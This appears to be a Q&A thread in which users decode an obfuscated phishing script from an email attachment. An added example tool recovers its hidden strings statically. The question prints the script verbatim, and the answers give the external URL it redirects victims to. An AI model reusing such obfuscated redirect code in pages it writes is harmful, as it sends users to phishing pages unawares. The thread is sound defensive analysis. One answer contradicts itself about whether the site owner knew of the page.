What does this suspicious phishing code do?

Several of my non-IT colleagues have opened an .html attachment in an email message that looks extremely suspicious. The result was a blank screen; it turned out that some JavaScript code was running.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> 

What did he do? This is beyond my knowledge of programming.

+6
javascript phishing
4 answers

It will redirect to the URL http://lendermedia.com/images/z.htm (follow it at your own risk).

Copy and paste the code into a decent JavaScript editor and format its source.

Key points:

 var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, ''); 

h will be equal to 'http://lendermedia.com/images/z.htm'

 t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 

t will contain a reference to document.location

 b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 

A property named href of b, which at this point (inside another function) really is t from the statement above, is assigned the value h, which is the URL.

Most of the code is simple noise; the actual functionality consists of this:

 function uK() { };
 uK.prototype = {
     f : function() {
         // 'http://lendermedia.com/images/z.htm' once the filler characters ^ H ! 9 X are stripped
         var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
         // 'location' once D r ] 6 > are stripped, so t = document.location
         t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
         function x(b) {
             // 'href' once . B T A I are stripped, so b.href = h
             b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
         }
         x(t);
     }
 };
 var tL = new uK();
 tL.f();
+19

I ran into the same problem and then found this page. Having done a WHOIS lookup for contact information, I contacted the owner of lendermedia.com, who seemed to have just learned that the z.htm page had been posted on his website with his knowledge and against his wishes. At the time I contacted him, I was able to browse his /images/ directory. He has since changed the permissions. All this is to say that this guy seems to be clean, but that is for you to decide.

+2

With less obfuscation, it does something like document.location.href = "http://lendermedia.com/images/z.htm"

0

The key part to understand is the replace(/[\^H\!9X]/g, '') parts: if the second argument to replace is '', then it simply removes the matched characters from the string in front of it.

A truly inelegant way of obfuscating things. Probably the goal is just to be random for each user and to avoid Bayesian spam filters.

0
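The hand deobfuscation in the first answer and the point about replace(/[...]/g, '') in the last one can be automated without ever running the attachment. The following is an added example, not code from the question or from any of the answers: it scans the posted script for the 'literal'.replace(/[filler]/g, '') idiom, constant-folds each occurrence, rewrites the script with the recovered strings inlined, and reports what the recovered strings are used for. The function names (fold, extractStrings, deobfuscate, describe), the role labels and the read/write heuristics are my own; the only input is the script from the question, embedded as a string. The script itself is never evaluated; the one thing compiled from attacker-controlled text is a regex character class, which can match characters but cannot execute code.

```javascript
// Added example (not part of the original question or answers): static
// recovery of strings hidden behind 'literal'.replace(/[filler]/g, '').
// Run with: node deobf.js

// The script from the question, minus its <script> tags. String.raw keeps
// the backslashes inside the regex character classes exactly as posted.
const SAMPLE = String.raw`function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;`;

// Matches 'single-quoted literal'.replace(/[character class]/g, '').
// Group 1 is the literal's contents, group 2 the character class body
// (escaped characters such as \] inside the class are allowed).
const IDIOM = /'((?:[^'\\]|\\.)*)'\.replace\(\/\[((?:[^\]\\]|\\.)*)\]\/g,\s*''\)/g;

// Do what the idiom does, but on our own terms: strip every character of
// the class from the literal. A RegExp built from a character class can
// only ever match characters; it cannot run script.
function fold(literal, charClass) {
  return literal.replace(new RegExp('[' + charClass + ']', 'g'), '');
}

// Recover every hidden string and guess its role from the surrounding
// source text: a URL, a property read such as document[...], or a
// property write such as b[...] = value (heuristic, assumption of mine).
function extractStrings(src) {
  const findings = [];
  for (const m of src.matchAll(IDIOM)) {
    const [whole, literal, charClass] = m;
    const decoded = fold(literal, charClass);
    const before = src.slice(Math.max(0, m.index - 16), m.index);
    const after = src.slice(m.index + whole.length, m.index + whole.length + 4);
    const obj = before.match(/(\w+)\[$/); // e.g. "document[" or "b["
    let role = 'value';
    let target = null;
    if (/^https?:\/\//i.test(decoded)) {
      role = 'url';
    } else if (obj && /^\]\s*=[^=]/.test(after)) {
      role = 'write';
      target = obj[1] + '.' + decoded;
    } else if (obj) {
      role = 'read';
      target = obj[1] + '.' + decoded;
    }
    findings.push({ literal, charClass, decoded, role, target });
  }
  return findings;
}

// Rewrite the script with each idiom replaced by its plain string literal,
// which turns the posted one-liner into something a formatter can lay out.
function deobfuscate(src) {
  return src.replace(IDIOM, (_, literal, charClass) =>
    JSON.stringify(fold(literal, charClass)));
}

// Summarise the classic redirect shape: a URL written into some .href.
function describe(findings) {
  const url = findings.find((f) => f.role === 'url');
  const nav = findings.find((f) => f.role === 'write' && /\.href$/.test(f.target));
  if (url && nav) {
    return 'sets ' + nav.target + ' = ' + url.decoded + ' (navigation / redirect)';
  }
  return 'no redirect pattern found';
}

const findings = extractStrings(SAMPLE);
for (const f of findings) {
  console.log(f.role.padEnd(5), f.decoded, f.target ? '(' + f.target + ')' : '');
}
console.log(describe(findings));
console.log(deobfuscate(SAMPLE));
```

This handles only the single-quoted replace idiom used by this particular sample; other droppers use different tricks (String.fromCharCode, eval of concatenated pieces, unescape), so treat the output as a first pass and still read the rewritten script rather than trusting the one-line summary.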
